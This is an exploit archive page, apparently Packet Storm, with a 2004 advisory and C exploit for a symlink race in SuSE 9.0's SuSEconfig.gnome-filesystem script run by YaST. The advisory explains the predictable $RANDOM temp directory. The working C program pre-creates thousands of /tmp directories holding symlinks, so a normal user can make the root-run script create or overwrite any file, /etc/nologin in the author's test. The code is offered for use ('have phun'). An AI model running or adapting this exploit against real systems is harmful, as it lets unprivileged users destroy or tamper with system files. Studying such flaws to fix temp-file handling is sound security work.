exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

susegnome.txt

susegnome.txt
Posted Jan 14, 2004
Authored by l0om | Site excluded.org

Local exploit that makes use of a symlink vulnerability in YaST when using SuSEconfig.gnome-filesystem.

tags | exploit, local
SHA-256 | b52db200e1ea04d1dd8b34e13eb95b40a438eeed156071a65829e4a699a709a6

susegnome.txt

Change Mirror Download


Author: l0om <l0om@excluded.org>
Date: 12.01.2004
page: www.excluded.org

SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem

There is a symlink problem in the
SuSEconfig.gnome-filesystem
scribt. a normal user can creat and overwrite every
file
on the system. This script gets executed after a
configuration change by the
setup tool YaST. So if you have installed gnome or
parts of gnome check this out.


When this scribt gets executed by YaST after a
configuration change it does the following:

TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM
mkdir $TEMP
touch $TEMP/list
[...]
echo >$TEMP/found
[...]

the env variable $RANDOM includes a random number.
in my tests
this number goes up from 1 to 33000. But also if it
goes up to
65535 it is still vul. to a symlink attack. this is
nearly as
bad as the symlink problem which has been found on
SuSE 8.2.
On 8.2 a SuSEconf scribt has created a link with the
$$ at the
file end.

I have used a little exploit written in C which
creats the
directory "/tmp/tmp.SuSEconfig.gnome-filesystem.1"
up to
33000. in every directory i have created a symlink
to a file
which i want to creat or to overwrite. as the
filename i have
taken the $TEMP/found and let it point to some file.
in my test i
have taken the /etc/nologin- and hey- it has worked!

have phun!


*******************************************************************/

#include <stdio.h>
#include <unistd.h>
#include <string.h>

#define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."
#define START 1
#define END 33000

int main(int argc, char **argv)
{
int i;
char buf[150];

printf("\tSuSE 9.0 YaST script
SuSEconfig.gnome-filesystem exploit\n");
printf("\t-------------------------------------------------------------
\n");
printf("\tdiscovered and written by l0om
<l0om@excluded.org>\n");
printf("\t WWW.EXCLUDED.ORG\n\n");

if(argc != 2) {
printf("usage: %s <destination-file>\n",argv[0]);
exit(0xff);
}

printf("### hit enter to create or overwrite file %
s: ",argv[1]); fflush(stdout);
read(1, buf, 1); fflush(stdin);

umask(0000);
printf("working\n\n");
for(i = START; i < END; i++) {
snprintf(buf, sizeof(buf),"%s%d",PATH,i);
if(mkdir(buf,00777) == -1) {
fprintf(stderr, "cannot creat directory [Nr.%d]
\n",i);
exit(0xff);
}
if(!(i%1000))printf(".");
strcat(buf, "/found");
if(symlink(argv[1], buf) == -1) {
fprintf(stderr, "cannot creat symlink from %s to %s
[Nr.%d]\n",buf,argv[1],i);
exit(0xff);
}
}
printf("\ndone!\n");
printf("next time the SuSE.gnome-filesystem script
gets executed\n");
printf("we will create or overwrite file %s
\n",argv[1]);
return(0x00);
} /* i cant wait for the new gobbles comic!! */
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close